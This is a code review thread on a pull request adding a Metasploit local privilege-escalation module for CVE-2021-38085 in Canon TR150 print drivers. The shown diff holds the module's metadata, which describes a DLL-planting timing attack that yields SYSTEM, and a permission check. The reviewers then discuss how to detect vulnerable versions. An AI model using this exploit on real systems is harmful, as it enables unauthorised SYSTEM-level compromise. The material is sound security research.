modules/exploits/windows/local/canon_driver_privesc.rb

```diff
@@ -0,0 +1,150 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Post::Windows::Priv
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Canon Driver Privilege Escalation',
+        'Description' => %q{
+          Canon TR150 print drivers versions 3.71.2.10 and below allow local users to read/write files
+          within the "CanonBJ" directory and its subdirectories. By writing a malicious DLL to the
+          C:\ProgramData\CanonBJ\IJPrinter\CNMWINDOWS\Canon TR150 series\LanguageModules\040C\CNMurGE.dll
+          path at the right time whilst running the C:\Windows\System32\Printing_Admin_Scripts\en-US\prnmngr.vbs
+          script to install a new printer, a timing issue can be exploited to cause the PrintIsolationHost.exe program,
+          which runs as NT AUTHORITY\SYSTEM, to successfully load the malicious DLL. Successful exploitation
+          will grant attackers code execution as the NT AUTHORITY\SYSTEM user.
+
+          This module leverages the prnmngr.vbs script
+          to add and delete printers. Multiple runs of this
+          module may be required given successful exploitation
+          is time-sensitive.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jacob Baines', # discovery, PoC, module
+          'Shelby Pace' # original Ricoh module
+        ],
+        'References' =>
+          [
+            ['CVE', '2021-38085'],
+          ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Platform' => 'win',
+        'SessionTypes' => [ 'meterpreter' ],
+        'Targets' =>
+          [
+            [
+              'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
+            ]
+          ],
+        'Notes' =>
+        {
+          'SideEffects' => [ ARTIFACTS_ON_DISK ],
+          'Reliability' => [ UNRELIABLE_SESSION ],
+          'Stability' => [ SERVICE_RESOURCE_LOSS ]
+        },
+        'DisclosureDate' => '2021-08-07',
+        'DefaultTarget' => 0
+      )
+    )
+
+    self.needs_cleanup = true
+  end
+
+  def check
+    @driver_path = ''
+    dir_name = 'C:\\ProgramData\\CanonBJ\\IJPrinter\\CNMWINDOWS\\Canon TR150 series'
+
+    return CheckCode::Safe('No Canon TR150 driver directory found') unless directory?(dir_name)
+
+    language_dirs = dir(dir_name)
+
+    return CheckCode::Detected('Detected Canon driver directory, but no language files') unless language_dirs.length
+
+    @driver_path = dir_name
+    @driver_path.concat('\\LanguageModules\\040C')
+    res = cmd_exec("icacls \"#{@driver_path}\"")
+    vulnerable = res.include?('\\Users:(OI)(CI)(F)')
```

Comment:
This fails on my Windows 10 machine as the string is `BUILTIN\Users:(I)(OI)(CI)(F)`, which means we have an extra `(I)` in the string. Probably better to change this to a regex.

Reply:
I'm going to switch this over to pnputil as well.

Reply:
Hmm so looks like `pnputil` isn't being having the driver version number updated when the patch is applied. Also the original check isn't working either. Going to have to come up with some better way of detecting vulnerable versions.

Reply:
Unless Canon has released something since last week, there is no patch for this.

Reply:
@jacob-baines Ah okay so Windows Printers and Multifunction Printers security patch Ver.1.0.1 from https://www.usa.canon.com/internet/portal/us/home/support/details/printers/mobile-compact-printer/pixma-tr150 shouldn't fix this then? Cause it seemed to not work for me after installing that patch but I didn't see the version number being bumped.

Reply:
Looks like installing that patch changes the `C:\ProgramData\CanonBJ\IJPrinter\CNMWINDOWS\Canon TR150 series\LanguageModules\040C` directory permissions in my tests. Readding the printer doesn't help things.

Reply:
Going to land this and keep the current check as it seems appropriate from my experience.

Reply:
👍 I'll give it a deeper looker. Could be I made a mistake on my initial analysis.